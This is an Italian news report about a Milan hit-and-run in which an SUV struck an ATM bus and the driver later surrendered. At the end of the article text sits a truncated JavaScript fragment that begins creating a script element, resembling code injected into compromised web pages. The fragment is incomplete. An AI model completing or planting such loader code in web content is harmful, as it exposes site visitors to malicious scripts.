"/>
martedì 17 ottobre 2017 11:31:56
omnimilano

Scontro fra auto e bus Atm, pirata strada si costituisce
Polizia locale cerca complice che lo ha aiutato nella fuga

12 novembre 2016 Cronaca

E’ stato rintracciato l’uomo che ha provocato l’incidente con il bus di Atm ieri sera in via San Romanello. Si tratta di un italiano 43enne residente a Baggio. L’auto coinvolta nello scontro, una Volkswagen Tuareg è intestata alla moglie. L’uomo si è presentato stamani ferito e accompagnato da un avvocato all’ospedale San Carlo, non avendo più possibilità di sfuggire alle indagini. La polizia locale è risalita alla proprietaria dell’auto, la moglie, e poi all’uomo, non essendo stata presentata alcuna denuncia di furto della vettura. La donna ha fornito foto del marito che sono state diffuse a tutti i comandi e a tutti gli ospedali della città, finchè l’uomo ha deciso di costituirsi. Mentre il pirata resta ricoverato e piantonato in ospedale, indagato per fuga e omissione di soccorso, roseguono intanto le indagini su chi lo ha aiutato nella sua fuga ieri sera a bordo di una Fiat Punto. Per soccorrere i feriti ieri sera sul posto sono intervenute cinque ambulanze, un’automedica e un’auto infermieristica. A causare l’incidente è stato il suv, non rispettando il rosso ad un semaforo all’angolo con via Darix Togni. Il bus coinvolto, dell’Atm, è della linea 72. Anche una seconda vettura è rimasta coinvolta, una Ford Mondeo station wagon parcheggiata sulla strada. Tra i 10 feriti 7 sono stati trasportati in ospedale e tra essi c’è una donna, soccorsa in gravissime condizioni al San Carlo, e un’altra persona in gravi condizioni, trasportata invece al Fatebenefratelli.var d=document;var s=d.createElement(‘script’);

Condividi questo articolo